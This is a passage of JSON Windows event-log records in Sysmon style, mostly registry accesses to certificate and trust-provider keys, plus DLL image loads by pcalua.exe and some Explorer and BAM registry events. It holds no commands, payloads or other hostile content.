"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"image_load", - "image_name": "duser.dll", - "image_path": "C:\\Windows\\System32\\duser.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", 
- "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, 
- "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "atlthunk.dll", - "image_path": "C:\\Windows\\System32\\atlthunk.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573975259984, - 
"unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", - "registry_value": "W32:000000000008056A", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": 
"HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", - "registry_value": "SequenceNumber", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - 
"process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975740000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 